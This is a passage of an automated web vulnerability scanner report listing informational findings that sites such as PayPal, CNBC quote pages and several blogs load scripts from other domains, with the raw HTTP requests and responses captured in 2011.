<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.7. http://blog.harbottle.com/dm/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.8. http://blog.ulf-wendel.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.ulf-wendel.de
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.9. http://blogs.oracle.com/otn/resource/html/tweet2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/resource/html/tweet2.html

Issue detail

The response dynamically includes the following script from another domain:

http://widgets.twimg.com/j/2/widget.js

Request

GET /otn/resource/html/tweet2.html HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 10 May 2011 19:11:50 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 51608509985984678
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=300+0;age=0;ecid=51608509985984678,0:1)
Content-Length: 905
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">

<title></title>
</head>
<body>

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

20.10. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Issue detail

The response dynamically includes the following script from another domain:

http://adadvisor.net/adscores/g.js?sid=9239766368

Request

GET /media/1956006/frame.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Content-Length: 98
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close
Vary: Accept-Encoding
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<script type="text/javascript" src="http://adadvisor.net/adscores/g.js?sid=9239766368"></script>

20.11. http://cdn5.tribalfusion.com/media/2516896//frm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/2516896//frm.html

Issue detail

The response dynamically includes the following script from another domain:

http://rd.rlcdn.com/rd?type=js&site=108544

Request

GET /media/2516896//frm.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 14:59:04 GMT
Content-Length: 1378
Connection: close
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<html>
<head>
<script type="text/javascript" src="http://rd.rlcdn.com/rd?type=js&site=108544"></script>
</head>
<body>
<script type="text/javascript">
var segMap = [
[ 40380496
...[SNIP]...

20.12. https://cms.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cms.paypal.com
Path:	/us/cgi-bin/

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /us/cgi-bin/ HTTP/1.1
Host: cms.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Expires: Tue, 06 Sep 2011 17:06:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:06:24 GMT
Content-Length: 24992
Connection: close
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 01-Sep-2031 17:06:24 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110822-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

20.13. http://data.cnbc.com/quotes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:05 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=1D2F47641A6DD26BE61912AD60DD5D15; Path=/
Content-Language: en
Content-Type: text/html;charset=UTF-8
Via: 1.1 aicache6
Content-Length: 128064
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.14. http://data.cnbc.com/quotes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/ HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 127964
X-Aicache-OS: 64.210.194.247:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.15. http://data.cnbc.com/quotes/.DJIA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.DJIA

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.DJIA HTTP/1.1
Host: data.cnbc.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_most_recent_quotes=.DJIA; s_cc=true; s_nr=1315339795979; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; cnbc_regional_cookie=US; cnbcStreamQuoteMasterToggleRememberSwitch=off

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:09:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117730
X-Aicache-OS: 64.210.194.248:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.16. http://data.cnbc.com/quotes/.DJIA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.DJIA

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/.DJIA HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:35 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117631
X-Aicache-OS: 64.210.194.247:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.17. http://data.cnbc.com/quotes/.DJIA/tab/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.DJIA/tab/1

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/.DJIA/tab/1 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:05:57 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117692
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.18. http://data.cnbc.com/quotes/.DJIA/tab/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.DJIA/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.DJIA/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:06 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117132
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.19. http://data.cnbc.com/quotes/.FCHI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.FCHI

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.FCHI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:19 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109733
X-Aicache-OS: 64.210.194.248:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.20. http://data.cnbc.com/quotes/.FCHI/tab/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.FCHI/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.FCHI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:17 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109139
X-Aicache-OS: 64.210.194.246:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.21. http://data.cnbc.com/quotes/.FTSE previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.FTSE

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/.FTSE HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:27 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109621
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.22. http://data.cnbc.com/quotes/.FTSE/tab/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.FTSE/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.FTSE/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:11 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109120
X-Aicache-OS: 64.210.194.248:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.23. http://data.cnbc.com/quotes/.GDAXI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.GDAXI

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.GDAXI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:14 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109813
X-Aicache-OS: 64.210.194.246:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
